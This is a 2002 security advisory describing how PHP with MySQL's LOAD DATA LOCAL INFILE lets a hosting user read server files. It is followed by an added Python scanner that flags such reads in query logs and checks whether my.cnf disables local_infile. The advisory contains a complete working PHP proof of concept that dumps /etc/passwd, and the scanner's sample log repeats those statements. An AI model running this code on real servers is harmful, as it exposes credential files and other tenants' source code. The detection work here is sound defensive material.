27th Nov 2002 [SBWID-5842]
COMMAND
Poorly configured MySQL/PHP may lead to privilege escalation
SYSTEMS AFFECTED
?
PROBLEM
Update (28 November 2002)
======
This issue was originally investigated by Dave Wilson, who claims authorship of the code:
http://botanicus.net/dw/sec.html
Hai Nam Luke [http://www.hackervn.net] found:
An attacker can use PHP and MySQL to read local files in the following way:
# Create a database (MySQL) and upload this file to your PHP server.
Code: viewfile.php (programmed by Luke)
======================================================
<?php
// config this data
$dbhost = ""; $dbuser = ""; $dbpasswd = ""; $dbname = "";
$file = "/etc/passwd"; // filename that you want to view
// shell code
echo "<pre>";
mysql_connect($dbhost, $dbuser, $dbpasswd);
$sql = array(
    "USE $dbname",
    // temporary table with a single LONGBLOB column to hold the file
    'CREATE TEMPORARY TABLE ' . ($tbl = 'A' . time()) . ' (a LONGBLOB)',
    // field/line terminators that never occur, so the whole file lands in one cell
    "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
        . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
        . "ESCAPED BY '' "
        . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
    "SELECT a FROM $tbl LIMIT 1"
);
foreach ($sql as $statement) {
    $query = mysql_query($statement);
    if ($query == false) die(
        "FAILED: " . $statement . "\n" .
        "REASON: " . mysql_error() . "\n"
    );
    if (! $r = @mysql_fetch_array($query, MYSQL_NUM)) continue;
    echo htmlspecialchars($r[0]);
    mysql_free_result($query);
}
echo "</pre>";
?>
======================================================
You will receive the full contents of /etc/passwd.
This vulnerability is very dangerous because a user can read important
files on your server. Especially on free hosting, a user can use this local
exploit to read other users' source code and attack them.
SOLUTION
Chroot ...
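The PoC above works because LOAD DATA LOCAL INFILE makes the MySQL client library (running inside the PHP process) read the file and ship it to the server. An added defender-side check, not part of the advisory or Luke's code: a scanner over MySQL general-query-log lines that reports LOAD DATA LOCAL statements whose path lies outside the directories where client-side imports are expected, plus a check of whether a my.cnf explicitly turns local_infile off on the server (the log lines, user names and paths below are constructed).

```python
import re
from typing import Dict, List

# Constructed MySQL general query log ("YYMMDD HH:MM:SS  Id Command  Argument" layout)
# reproducing the PoC's statement sequence next to a legitimate import. Not a real capture.
SAMPLE_LOG = """\
021127 14:03:12\t   5 Connect\twebuser@localhost on appdb
021127 14:03:12\t   5 Query\tUSE appdb
021127 14:03:12\t   5 Query\tCREATE TEMPORARY TABLE A1038405792 (a LONGBLOB)
021127 14:03:12\t   5 Query\tLOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE A1038405792 FIELDS TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY '' LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'
021127 14:03:12\t   5 Query\tSELECT a FROM A1038405792 LIMIT 1
021127 14:05:40\t   6 Connect\timporter@localhost on appdb
021127 14:05:41\t   6 Query\tLOAD DATA LOCAL INFILE '/var/www/uploads/prices.csv' INTO TABLE prices
021127 14:05:42\t   6 Quit\t
"""

# Timestamp is optional: the general log omits it when it equals the previous line's.
LOG_LINE = re.compile(r"^(?:\d{6} \d\d:\d\d:\d\d)?\s*(?P<id>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")
LOCAL_INFILE = re.compile(
    r"\bLOAD\s+DATA\s+(?:LOW_PRIORITY\s+|CONCURRENT\s+)?LOCAL\s+INFILE\s+'([^']*)'", re.I)

def find_local_infile_reads(log_text: str, allowed_prefixes: List[str]) -> List[Dict[str, str]]:
    """One finding per LOAD DATA LOCAL INFILE whose path is outside allowed_prefixes.
    The file is read by the client process (here PHP under the web server's uid), so the
    path is judged against where legitimate client-side imports live, not the datadir."""
    users: Dict[str, str] = {}  # connection id -> "user@host on db" from Connect lines
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # header line or continuation of a multi-line statement
        cid, cmd, arg = m.group("id"), m.group("cmd"), m.group("arg")
        if cmd == "Connect":
            users[cid] = arg
        elif cmd == "Query":
            hit = LOCAL_INFILE.search(arg)
            if hit and not any(hit.group(1).startswith(p) for p in allowed_prefixes):
                findings.append({"conn": cid, "user": users.get(cid, "?"), "path": hit.group(1)})
    return findings

def local_infile_disabled(my_cnf: str) -> bool:
    """True if the [mysqld] section explicitly disables local_infile (local-infile=0/OFF
    or skip-local-infile), so the server refuses LOAD DATA LOCAL from any client.
    A config without the option keeps the build's default, which was ON in MySQL of this era."""
    section, disabled = None, False
    for raw in my_cnf.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "mysqld":
            m = re.match(r"(skip[-_])?local[-_]infile\s*(?:=\s*(\S+))?$", line, re.I)
            if m:  # a bare "local-infile" means enabled (=1)
                disabled = bool(m.group(1)) or (m.group(2) or "1").lower() in ("0", "off", "false")
    return disabled
```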